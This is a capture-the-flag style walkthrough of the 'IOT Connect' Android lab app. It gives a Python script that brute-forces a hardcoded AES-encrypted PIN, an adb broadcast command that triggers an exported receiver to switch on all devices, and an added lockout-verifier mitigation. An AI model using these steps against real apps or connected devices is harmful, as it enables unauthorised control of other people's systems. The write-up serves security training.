# IOT Connect

1. After installing the APK, we open it, register, and then log in with our account.
2. After logging in, we found that we can't control all devices.

   ![image.png](https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FiYIXMNGlybM8oF74Mwn2%2Fimage.png?alt=media)
3. Our approach is to enable the Master Switch, so let's try to use it.

   <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2Ff6YR1jfHA17XDYdqZvUp%2Fimage.png?alt=media&#x26;token=aa94b7d1-747b-4a1a-aae4-39b849e144cd" alt="" width="231"><figcaption></figcaption></figure>
4. We don't have a PIN code.
5. Let's examine `AndroidManifest.xml`, specifically the activity **`com.mobilehackinglab.iotconnect.MasterSwitchActivity`**.

   * This code shows a few things:
     * First, the user cannot control the Master Switch.
     * Valid users must **enter a PIN** before enabling the switch.
     * Then the app sends an intent to enable the Master Switch.

   <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2F6AZRA84vJMxQ31vrXhJ4%2Fimage.png?alt=media&#x26;token=05c6227b-e028-4e02-8d98-7d9c0aaa2aa9" alt="" width="375"><figcaption></figcaption></figure>
6. Let's examine the `BroadcastReceiver initialize` class. We found that:

   It will work when the PIN is correct.

   <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FSu0BspWt49p0a1EnA9Yb%2Fimage.png?alt=media&#x26;token=b336fca5-dbcc-42ef-9d2d-a7308b3bd716" alt=""><figcaption></figcaption></figure>
7. After searching the code, I found the `Checker` class.

   <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FvbiNONuRFOSS9jegzIsD%2Fimage.png?alt=media&#x26;token=8dc683c1-3687-4688-9efe-ba5939324379" alt=""><figcaption></figcaption></figure>
8. Here we have the PIN `OSnaALIWUkpOziVAMycaZQ==` and the AES encryption hardcoded in the application, so let's create a script to decrypt it.

   ```python
   from Crypto.Cipher import AES
   import base64

   encrypted_text = 'OSnaALIWUkpOziVAMycaZQ=='  # The base64 encoded string from the Java code

   def create_key_from_number(num):
       """
       Create a 16-byte key from a number by converting it to a byte array
       and padding with zeros to ensure the key length is 16 bytes.
       """
       key = str(num).encode('utf-8')  # Convert number to bytes
       key = key.ljust(16, b'\0')  # Pad the key to 16 bytes if it's shorter
       return key

   def attempt_decrypt(encrypted_text, key):
       """
       Attempt to decrypt the encrypted text using the provided key.
       Returns the decrypted text if successful, or None if decryption fails.
       """
       cipher = AES.new(key, AES.MODE_ECB)
       try:
           decrypted_bytes = cipher.decrypt(base64.b64decode(encrypted_text))
           decrypted_text = decrypted_bytes.decode('utf-8').strip()
           return decrypted_text
       except (ValueError, UnicodeDecodeError):
           return None

   def brute_force_decrypt(encrypted_text):
       """
       Brute-force attempt to find the correct key for AES decryption.
       Searches for a key that produces meaningful output, like "master_on".
       """
       for num in range(1000):
           key = create_key_from_number(num)
           decrypted_text = attempt_decrypt(encrypted_text, key)
           
           if decrypted_text and "master_on" in decrypted_text:
               print(f"Decrypt success and the key is {num}")
               print(f"Decrypted text: {decrypted_text}")
               return
       print("No valid key found")

   # Start the brute-force decryption attempt
   brute_force_decrypt(encrypted_text)

   ```

   <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FztI4k6iLJQJHGxEjwe3n%2Fimage.png?alt=media&#x26;token=8d7c7cbb-17a3-4172-8727-9f2c908b5978" alt=""><figcaption></figcaption></figure>
9. Then we call the broadcast receiver **`MasterReceiver`** by sending a broadcast intent with the `MASTER_ON` action and `345` as the `key` extra: `adb shell am broadcast -a MASTER_ON --ei key 345`

   <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FUIuGjPCP3D7VFKlh26eL%2Fimage.png?alt=media&#x26;token=8bad7c0c-3aeb-4221-b986-22da03d097ee" alt=""><figcaption></figcaption></figure>

And we are done: all devices are now turned on.
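
The brute force in step 8 succeeds because the check ships inside the APK and the script needs at most 1,000 tries, all of them offline and unlimited. As an added example (not part of the original writeup or the app's code), the block below models the mitigation: a PIN verifier that counts failures and locks out, then replays the same 0..999 enumeration against it. `PinGate`, `sweep`, the 5-attempt limit and the PBKDF2 work factor are assumptions, and the verifier is assumed to run where the client cannot read its state, such as a backend.

```python
import hashlib
import hmac
import os

MAX_FAILURES = 5          # assumed lockout policy
PBKDF2_ROUNDS = 100_000   # assumed work factor


class PinGate:
    """PIN verifier assumed to run outside the APK, so its state is not readable by the client."""

    def __init__(self, pin: str):
        self._salt = os.urandom(16)
        self._digest = self._derive(pin)
        self._failures = 0

    def _derive(self, pin: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", pin.encode(), self._salt, PBKDF2_ROUNDS)

    @property
    def locked(self) -> bool:
        return self._failures >= MAX_FAILURES

    def verify(self, pin: str) -> bool:
        # Refuse before doing any work once the failure budget is spent.
        if self.locked:
            return False
        ok = hmac.compare_digest(self._derive(pin), self._digest)
        self._failures = 0 if ok else self._failures + 1
        return ok


def sweep(gate: PinGate, candidates) -> tuple:
    """Enumerate candidates as the script in step 8 does; return (hit, attempts evaluated)."""
    evaluated = 0
    for num in candidates:
        if gate.locked:
            break
        evaluated += 1
        if gate.verify(str(num)):
            return num, evaluated
    return None, evaluated


if __name__ == "__main__":
    gate = PinGate("345")             # constructed sample PIN, same value as in step 9
    print(sweep(gate, range(1000)))   # enumeration stops at the lockout
    print(gate.verify("345"))         # refused while locked
```

A slow hash alone would not help here: with only 1,000 candidates, any verifier an attacker can copy out of the APK is recoverable offline, so the attempt counter has to live somewhere the client does not control.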
